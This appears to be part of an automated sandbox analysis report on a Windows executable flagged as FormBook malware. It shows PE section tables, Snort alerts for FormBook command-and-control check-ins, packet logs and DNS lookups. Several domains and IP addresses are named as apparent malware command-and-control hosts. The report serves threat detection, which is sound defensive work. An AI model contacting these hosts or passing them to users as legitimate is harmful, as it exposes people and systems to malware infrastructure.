                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x598.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb4c100x1c.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xb2c500xb2e00False0.9252789788609365data7.896625540706908IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xb60000x5980x600False0.416015625data4.06200688940225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_VERSION0xb60a00x30cdata
                                                              RT_MANIFEST0xb63ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              192.168.2.3148.251.13.12649692802031453 02/10/23-12:45:28.335977TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969280192.168.2.3148.251.13.126
                                                              192.168.2.38.8.8.861626532023883 02/10/23-12:45:54.046998UDP2023883ET DNS Query to a *.top domain - Likely Hostile6162653192.168.2.38.8.8.8
                                                              192.168.2.381.17.18.19849683802031453 02/10/23-12:44:55.405933TCP2031453ET TROJAN FormBook CnC Checkin (GET)4968380192.168.2.381.17.18.198
                                                              192.168.2.381.17.18.19849683802031412 02/10/23-12:44:55.405933TCP2031412ET TROJAN FormBook CnC Checkin (GET)4968380192.168.2.381.17.18.198
                                                              192.168.2.3148.251.13.12649692802031449 02/10/23-12:45:28.335977TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969280192.168.2.3148.251.13.126
                                                              192.168.2.381.17.18.19849683802031449 02/10/23-12:44:55.405933TCP2031449ET TROJAN FormBook CnC Checkin (GET)4968380192.168.2.381.17.18.198
                                                              192.168.2.3148.251.13.12649692802031412 02/10/23-12:45:28.335977TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969280192.168.2.3148.251.13.126

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Feb 10, 2023 12:44:55.384490967 CET4968380192.168.2.381.17.18.198
                                                              Feb 10, 2023 12:44:55.405323982 CET804968381.17.18.198192.168.2.3
                                                              Feb 10, 2023 12:44:55.405759096 CET4968380192.168.2.381.17.18.198
                                                              Feb 10, 2023 12:44:55.405932903 CET4968380192.168.2.381.17.18.198
                                                              Feb 10, 2023 12:44:55.426544905 CET804968381.17.18.198192.168.2.3
                                                              Feb 10, 2023 12:44:55.434031010 CET804968381.17.18.198192.168.2.3
                                                              Feb 10, 2023 12:44:55.434211016 CET804968381.17.18.198192.168.2.3
                                                              Feb 10, 2023 12:44:55.434432983 CET4968380192.168.2.381.17.18.198
                                                              Feb 10, 2023 12:44:55.434704065 CET4968380192.168.2.381.17.18.198
                                                              Feb 10, 2023 12:44:55.455353975 CET804968381.17.18.198192.168.2.3
                                                              Feb 10, 2023 12:45:00.476815939 CET4968480192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:00.651869059 CET8049684199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:00.652174950 CET4968480192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:00.737787962 CET4968480192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:00.912400007 CET8049684199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:01.060570002 CET8049684199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:01.060656071 CET8049684199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:01.060738087 CET4968480192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:02.273253918 CET4968480192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:03.349782944 CET4968580192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:03.525582075 CET8049685199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:03.525706053 CET4968580192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:03.525937080 CET4968580192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:03.702224970 CET8049685199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:03.893599033 CET8049685199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:03.893794060 CET8049685199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:03.893901110 CET4968580192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:05.028805017 CET4968580192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:06.044719934 CET4968680192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:06.220108986 CET8049686199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:06.220242023 CET4968680192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:06.220357895 CET4968680192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:06.395103931 CET8049686199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:06.542025089 CET8049686199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:06.542464972 CET8049686199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:06.542721987 CET4968680192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:06.556252003 CET4968680192.168.2.3199.192.22.198
                                                              Feb 10, 2023 12:45:06.730678082 CET8049686199.192.22.198192.168.2.3
                                                              Feb 10, 2023 12:45:11.602189064 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:11.736857891 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:11.737097979 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:11.737200022 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:11.923784018 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.642971992 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643018961 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643050909 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643084049 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643095016 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:12.643120050 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643151999 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643176079 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:12.643183947 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643215895 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643238068 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:12.643249035 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643280029 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.643296003 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:12.643372059 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:12.778928041 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.778986931 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.779031992 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.779062033 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:12.779077053 CET8049687103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:12.779153109 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:13.248408079 CET4968780192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:14.264890909 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:14.406375885 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:14.409678936 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:14.409955978 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:14.553617001 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397419930 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397497892 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397556067 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397600889 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.397612095 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397671938 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.397677898 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397737026 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397789955 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397793055 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.397850037 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397905111 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.397908926 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.397962093 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.398046017 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.544486046 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.544552088 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.544606924 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.544619083 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.544656992 CET8049688103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:15.544725895 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:15.920188904 CET4968880192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:16.944451094 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:17.077019930 CET8049689103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:17.078807116 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:17.082138062 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:17.256587982 CET8049689103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:17.859095097 CET8049689103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:17.859854937 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:17.859854937 CET4968980192.168.2.3103.191.208.50
                                                              Feb 10, 2023 12:45:18.008632898 CET8049689103.191.208.50192.168.2.3
                                                              Feb 10, 2023 12:45:23.219278097 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:23.242948055 CET8049690148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:23.243231058 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:23.243403912 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:23.276992083 CET8049690148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:23.277045965 CET8049690148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:23.277062893 CET8049690148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:23.277185917 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:24.749123096 CET4969080192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.770337105 CET4969180192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.793438911 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.795167923 CET4969180192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.795381069 CET4969180192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.818365097 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818402052 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818423986 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818445921 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818460941 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818475962 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:25.818545103 CET4969180192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:25.841502905 CET8049691148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.312261105 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.335571051 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.335752010 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.335977077 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.359148979 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.359185934 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.359209061 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:28.359375954 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.359615088 CET4969280192.168.2.3148.251.13.126
                                                              Feb 10, 2023 12:45:28.382673979 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:33.473675966 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:33.493204117 CET804969381.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:33.493596077 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:33.493596077 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:33.513207912 CET804969381.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:33.514517069 CET804969381.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:33.514544010 CET804969381.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:33.514753103 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:35.003005028 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:36.016433954 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:36.036139011 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.036380053 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:36.036664963 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:36.056286097 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.056339025 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.057223082 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.057262897 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.057363033 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:37.547899008 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.563196898 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.584816933 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:38.584952116 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.585104942 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.606523037 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:38.607533932 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:38.607569933 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:38.607793093 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.607975960 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.629409075 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:43.636437893 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:43.656043053 CET804969681.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:43.656203985 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:43.656374931 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:43.675986052 CET804969681.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:43.676640987 CET804969681.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:43.676666021 CET804969681.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:43.676757097 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:45.157071114 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:46.173561096 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:46.193304062 CET804969781.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:46.193536997 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:46.193809032 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:46.213588953 CET804969781.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:46.214030027 CET804969781.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:46.214090109 CET804969781.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:46.214215994 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:47.704127073 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.726511002 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.746392965 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:48.746642113 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.746792078 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.766446114 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:48.767123938 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:48.767154932 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:48.767390013 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.767529964 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.787126064 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:54.253885984 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:54.379700899 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.380067110 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:54.380230904 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:54.500720978 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.500844955 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.500895977 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.500932932 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.501157045 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:55.893537998 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:56.914768934 CET4970080192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:57.077821016 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.077972889 CET4970080192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:57.078356981 CET4970080192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:57.241241932 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241301060 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241322994 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241360903 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241379023 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241395950 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241399050 CET4970080192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:57.404419899 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.600841999 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.763914108 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.764055967 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.764292955 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.927285910 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.927357912 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.927386999 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.927408934 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.927592039 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.927648067 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.927860975 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:46:00.090828896 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:46:12.199752092 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:12.218889952 CET804970291.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:12.219048977 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:12.221292973 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:12.240909100 CET804970291.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:12.240964890 CET804970291.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:12.241117954 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:23.613442898 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:24.629501104 CET4970380192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:24.649058104 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.649324894 CET4970380192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:24.649605036 CET4970380192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:24.669061899 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.669120073 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.669223070 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.669276953 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.670975924 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.671022892 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.671235085 CET4970380192.168.2.391.195.240.117

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Feb 10, 2023 12:44:48.301093102 CET5897453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:44:49.294585943 CET5897453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:44:50.341556072 CET53589748.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:44:51.407941103 CET53589748.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:44:55.361419916 CET6372253192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:44:55.379592896 CET53637228.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:00.455368996 CET6552253192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:00.474994898 CET53655228.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:11.583144903 CET5986953192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:11.601275921 CET53598698.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:22.878492117 CET5439753192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:23.216640949 CET53543978.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:33.416465998 CET5932453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:33.470618963 CET53593248.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:43.613111973 CET5901453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:43.635341883 CET53590148.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:54.046998024 CET6162653192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:54.252531052 CET53616268.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:46:04.943521023 CET6178753192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:46:04.967170000 CET53617878.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:46:05.974512100 CET5892153192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:46:05.995754004 CET53589218.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:46:07.022134066 CET6270453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:46:07.048252106 CET53627048.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:46:12.089973927 CET4997753192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:46:12.198293924 CET53499778.8.8.8192.168.2.3

                                                              ICMP Packets

                                                              TimestampSource IPDest IPChecksumCodeType
                                                              Feb 10, 2023 12:44:51.408092976 CET192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Feb 10, 2023 12:44:48.301093102 CET192.168.2.38.8.8.80xa631Standard query (0)www.verde-amar.infoA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:44:49.294585943 CET192.168.2.38.8.8.80xa631Standard query (0)www.verde-amar.infoA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:44:55.361419916 CET192.168.2.38.8.8.80x9472Standard query (0)www.jewelryimpact.comA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:00.455368996 CET192.168.2.38.8.8.80x935bStandard query (0)www.specigain.onlineA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:11.583144903 CET192.168.2.38.8.8.80xd3ecStandard query (0)www.treebarktees.comA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:22.878492117 CET192.168.2.38.8.8.80x94abStandard query (0)www.gachthe365.siteA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:33.416465998 CET192.168.2.38.8.8.80xfd2aStandard query (0)www.frogair.onlineA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:43.613111973 CET192.168.2.38.8.8.80xa128Standard query (0)www.krankenzusatz.netA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:54.046998024 CET192.168.2.38.8.8.80x3410Standard query (0)www.hotelyeah.topA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:46:04.943521023 CET192.168.2.38.8.8.80x5bd5Standard query (0)www.tobinrasheedja.cyouA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:46:05.974512100 CET192.168.2.38.8.8.80xad29Standard query (0)www.tobinrasheedja.cyouA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:46:07.022134066 CET192.168.2.38.8.8.80x4c62Standard query (0)www.tobinrasheedja.cyouA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:46:12.089973927 CET192.168.2.38.8.8.80x42aaStandard query (0)www.nativealternatives.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Feb 10, 2023 12:44:50.341556072 CET8.8.8.8192.168.2.30xa631Server failure (2)www.verde-amar.infononenoneA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:44:51.407941103 CET8.8.8.8192.168.2.30xa631Server failure (2)www.verde-amar.infononenoneA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:44:55.379592896 CET8.8.8.8192.168.2.30x9472No error (0)www.jewelryimpact.com81.17.18.198A (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:00.474994898 CET8.8.8.8192.168.2.30x935bNo error (0)www.specigain.online199.192.22.198A (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:11.601275921 CET8.8.8.8192.168.2.30xd3ecNo error (0)www.treebarktees.comtreebarktees.comCNAME (Canonical name)IN (0x0001)false
                                                              Feb 10, 2023 12:45:11.601275921 CET8.8.8.8192.168.2.30xd3ecNo error (0)treebarktees.com103.191.208.50A (IP address)IN (0x0001)false
